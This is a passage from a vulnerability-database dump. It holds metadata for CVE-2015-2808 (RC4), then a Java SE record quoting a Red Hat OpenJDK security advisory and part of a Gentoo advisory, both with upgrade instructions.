"trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2736" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7214" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4514" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2729" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2738" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7198" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0815" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2740" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2728" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0811" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4000" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0813" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0798" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2726" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7222" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2727" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0798" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2725" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2706" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2734" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2741" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0804" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0806" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0808" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0815" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2706" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2727" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0816" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2725" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2731" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0807" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2722" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2722" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0803" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7213" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0814" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05289935" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2566" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2004-2761" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3183" }, { "trust": 0.1, "url": "http://software.hp.com" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0231" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5704" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2619" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-2613" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4729" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4736" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4736" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4729" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2596" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-2619" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-2596" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://softwaresupport.hp.com/group/softwaresupport/search-" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" } ], "sources": [ { "db": "VULHUB", "id": "VHN-80769" }, { "db": "BID", "id": "73684" }, { "db": "PACKETSTORM", "id": "133274" }, { "db": "PACKETSTORM", "id": "133234" }, { "db": "PACKETSTORM", "id": "133344" }, { "db": "PACKETSTORM", "id": "135088" }, { "db": "PACKETSTORM", "id": "133366" }, { "db": "PACKETSTORM", "id": "138866" }, { "db": "PACKETSTORM", "id": "132729" }, { "db": "PACKETSTORM", "id": "133990" }, { "db": "PACKETSTORM", "id": "132728" }, { "db": "PACKETSTORM", "id": "132345" }, { "db": "PACKETSTORM", "id": "136248" }, { "db": "PACKETSTORM", "id": "132697" }, { "db": "NVD", "id": "CVE-2015-2808" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-80769" }, { "db": "BID", "id": "73684" }, { "db": "PACKETSTORM", "id": "133274" }, { "db": "PACKETSTORM", "id": "133234" }, { "db": "PACKETSTORM", "id": "133344" }, { "db": "PACKETSTORM", "id": "135088" }, { "db": "PACKETSTORM", "id": "133366" }, { "db": "PACKETSTORM", "id": "138866" }, { "db": "PACKETSTORM", "id": "132729" }, { "db": "PACKETSTORM", "id": "133990" }, { "db": "PACKETSTORM", "id": "132728" }, { "db": "PACKETSTORM", "id": "132345" }, { "db": "PACKETSTORM", "id": "136248" }, { "db": "PACKETSTORM", "id": "132697" }, { "db": "NVD", "id": "CVE-2015-2808" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-04-01T00:00:00", "db": "VULHUB", "id": "VHN-80769" }, { "date": "2015-03-31T00:00:00", "db": "BID", "id": "73684" }, { "date": "2015-08-24T22:05:27", "db": "PACKETSTORM", "id": "133274" }, { "date": "2015-08-21T16:58:35", "db": "PACKETSTORM", "id": "133234" }, { "date": "2015-08-27T13:19:00", "db": "PACKETSTORM", "id": "133344" }, { "date": "2015-12-30T16:38:58", "db": "PACKETSTORM", "id": "135088" }, { "date": "2015-08-28T19:22:00", "db": "PACKETSTORM", "id": "133366" }, { "date": "2016-09-27T13:59:31", "db": "PACKETSTORM", "id": "138866" }, { "date": "2015-07-17T19:49:52", "db": "PACKETSTORM", "id": "132729" }, { "date": "2015-10-16T01:44:08", "db": "PACKETSTORM", "id": "133990" }, { "date": "2015-07-17T19:49:22", "db": "PACKETSTORM", "id": "132728" }, { "date": "2015-06-17T23:50:12", "db": "PACKETSTORM", "id": "132345" }, { "date": "2016-03-15T13:14:00", "db": "PACKETSTORM", "id": "136248" }, { "date": "2015-07-16T17:45:29", "db": "PACKETSTORM", "id": "132697" }, { "date": "2015-04-01T02:00:35.097000", "db": "NVD", "id": "CVE-2015-2808" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-01-18T00:00:00", "db": "VULHUB", "id": "VHN-80769" }, { "date": "2018-09-26T07:00:00", "db": "BID", "id": "73684" }, { "date": "2024-11-21T02:28:07.190000", "db": "NVD", "id": "CVE-2015-2808" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "73684" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SSL/TLS RC4 CVE-2015-2808 Information Disclosure Weakness", "sources": [ { "db": "BID", "id": "73684" } ], "trust": 0.3 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "73684" } ], "trust": 0.3 } }
var-201404-0374
Vulnerability from variot
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Security. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. Affects the confidentiality and integrity of data. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-openjdk security update Advisory ID: RHSA-2014:0406-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0406.html Issue date: 2014-04-16 CVE Names: CVE-2014-0429 CVE-2014-0446 CVE-2014-0451 CVE-2014-0452 CVE-2014-0453 CVE-2014-0454 CVE-2014-0455 CVE-2014-0456 CVE-2014-0457 CVE-2014-0458 CVE-2014-0459 CVE-2014-0460 CVE-2014-0461 CVE-2014-1876 CVE-2014-2397 CVE-2014-2398 CVE-2014-2402 CVE-2014-2403 CVE-2014-2412 CVE-2014-2413 CVE-2014-2414 CVE-2014-2421 CVE-2014-2423 CVE-2014-2427 =====================================================================
- Summary:
Updated java-1.7.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit.
An input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when processed. A remote attacker, or an untrusted Java application or applet, could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2014-0429)
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions. (CVE-2014-0456, CVE-2014-2397, CVE-2014-2421)
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2014-0457, CVE-2014-0455, CVE-2014-0461)
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2014-2412, CVE-2014-0451, CVE-2014-0458, CVE-2014-2423, CVE-2014-0452, CVE-2014-2414, CVE-2014-2402, CVE-2014-0446, CVE-2014-2413, CVE-2014-0454, CVE-2014-2427, CVE-2014-0459)
Multiple flaws were identified in the Java Naming and Directory Interface (JNDI) DNS client. These flaws could make it easier for a remote attacker to perform DNS spoofing attacks. (CVE-2014-0460)
It was discovered that the JAXP component did not properly prevent access to arbitrary files when a SecurityManager was present. This flaw could cause a Java application using JAXP to leak sensitive information, or affect application availability. (CVE-2014-2403)
It was discovered that the Security component in OpenJDK could leak some timing information when performing PKCS#1 unpadding. This could possibly lead to the disclosure of some information that was meant to be protected by encryption. (CVE-2014-0453)
It was discovered that the fix for CVE-2013-5797 did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks. (CVE-2014-2398)
An insecure temporary file use flaw was found in the way the unpack200 utility created log files. A local attacker could possibly use this flaw to perform a symbolic link attack and overwrite arbitrary files with the privileges of the user running unpack200. (CVE-2014-1876)
Note: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website.
All users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618) 1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736) 1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766) 1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841) 1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394) 1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858) 1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854) 1087423 - CVE-2014-2397 OpenJDK: classfile parser invalid BootstrapMethods attribute length (Hotspot, 8034926) 1087424 - CVE-2014-0455 OpenJDK: MethodHandle variable argument lists handling (Libraries, 8029844) 1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794) 1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010) 1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797) 1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152) 1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030) 1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188) 1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801) 1087438 - CVE-2014-2402 OpenJDK: Incorrect NIO channel separation (Libraries, 8026716) 1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740) 1087440 - CVE-2014-0454 OpenJDK: Prevent SIGNATURE_PRIMITIVE_SET from being modified (Security, 8029745) 1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163) 1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731) 1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282) 1087444 - CVE-2014-0459 lcms: insufficient ICC profile version validation (OpenJDK 2D, 8031335) 1087446 - CVE-2014-2413 OpenJDK: method handle call hierachy bypass (Libraries, 8032686)
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm
i386: java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm
i386: java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.i686.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.i686.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.i686.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.1.el6_5.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm
x86_64: java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.1.el6_5.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm
i386: java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.i686.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.1.el6_5.noarch.rpm
x86_64: java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm
i386: java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.i686.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.i686.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.i686.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm
i386: java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.i686.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.1.el6_5.noarch.rpm
x86_64: java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm
i386: java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.i686.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.i686.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.i686.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-0429.html https://www.redhat.com/security/data/cve/CVE-2014-0446.html https://www.redhat.com/security/data/cve/CVE-2014-0451.html https://www.redhat.com/security/data/cve/CVE-2014-0452.html https://www.redhat.com/security/data/cve/CVE-2014-0453.html https://www.redhat.com/security/data/cve/CVE-2014-0454.html https://www.redhat.com/security/data/cve/CVE-2014-0455.html https://www.redhat.com/security/data/cve/CVE-2014-0456.html https://www.redhat.com/security/data/cve/CVE-2014-0457.html https://www.redhat.com/security/data/cve/CVE-2014-0458.html https://www.redhat.com/security/data/cve/CVE-2014-0459.html https://www.redhat.com/security/data/cve/CVE-2014-0460.html https://www.redhat.com/security/data/cve/CVE-2014-0461.html https://www.redhat.com/security/data/cve/CVE-2014-1876.html https://www.redhat.com/security/data/cve/CVE-2014-2397.html https://www.redhat.com/security/data/cve/CVE-2014-2398.html https://www.redhat.com/security/data/cve/CVE-2014-2402.html https://www.redhat.com/security/data/cve/CVE-2014-2403.html https://www.redhat.com/security/data/cve/CVE-2014-2412.html https://www.redhat.com/security/data/cve/CVE-2014-2413.html https://www.redhat.com/security/data/cve/CVE-2014-2414.html https://www.redhat.com/security/data/cve/CVE-2014-2421.html https://www.redhat.com/security/data/cve/CVE-2014-2423.html https://www.redhat.com/security/data/cve/CVE-2014-2427.html https://access.redhat.com/security/updates/classification/#critical
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTTmzQXlSAg2UNWIIRAtKdAKCBGCXcmdsIke6rE6wALE8rmyh8PgCfVt/K i9yLmC1ovZP+Sr9z+PQskyk= =avQw -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201502-12
http://security.gentoo.org/
Severity: Normal Title: Oracle JRE/JDK: Multiple vulnerabilities Date: February 15, 2015 Bugs: #507798, #508716, #517220, #525464 ID: 201502-12
Synopsis
Multiple vulnerabilities have been found in Oracle's Java SE Development Kit and Runtime Environment, the worst of which could lead to execution of arbitrary code. Please review the CVE identifiers referenced below for details.
Impact
A context-dependent attacker may be able to execute arbitrary code, disclose, update, insert, or delete certain data.
Workaround
There is no known workaround at this time.
Resolution
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.71"
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.71"
All users of the precompiled 32-bit Oracle JRE should upgrade to the latest version:
# emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.71"
References
[ 1 ] CVE-2014-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429 [ 2 ] CVE-2014-0432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0432 [ 3 ] CVE-2014-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446 [ 4 ] CVE-2014-0448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0448 [ 5 ] CVE-2014-0449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0449 [ 6 ] CVE-2014-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451 [ 7 ] CVE-2014-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452 [ 8 ] CVE-2014-0453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453 [ 9 ] CVE-2014-0454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0454 [ 10 ] CVE-2014-0455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0455 [ 11 ] CVE-2014-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456 [ 12 ] CVE-2014-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457 [ 13 ] CVE-2014-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458 [ 14 ] CVE-2014-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459 [ 15 ] CVE-2014-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460 [ 16 ] CVE-2014-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461 [ 17 ] CVE-2014-0463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0463 [ 18 ] CVE-2014-0464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0464 [ 19 ] CVE-2014-2397 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397 [ 20 ] CVE-2014-2398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398 [ 21 ] CVE-2014-2401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2401 [ 22 ] CVE-2014-2402 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2402 [ 23 ] CVE-2014-2403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403 [ 24 ] CVE-2014-2409 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2409 [ 25 ] CVE-2014-2410 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2410 [ 26 ] CVE-2014-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412 [ 27 ] CVE-2014-2413 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2413 [ 28 ] CVE-2014-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414 [ 29 ] CVE-2014-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2420 [ 30 ] CVE-2014-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421 [ 31 ] CVE-2014-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2422 [ 32 ] CVE-2014-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423 [ 33 ] CVE-2014-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427 [ 34 ] CVE-2014-2428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2428 [ 35 ] CVE-2014-2483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2483 [ 36 ] CVE-2014-2490 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2490 [ 37 ] CVE-2014-4208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4208 [ 38 ] CVE-2014-4209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4209 [ 39 ] CVE-2014-4216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4216 [ 40 ] CVE-2014-4218 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4218 [ 41 ] 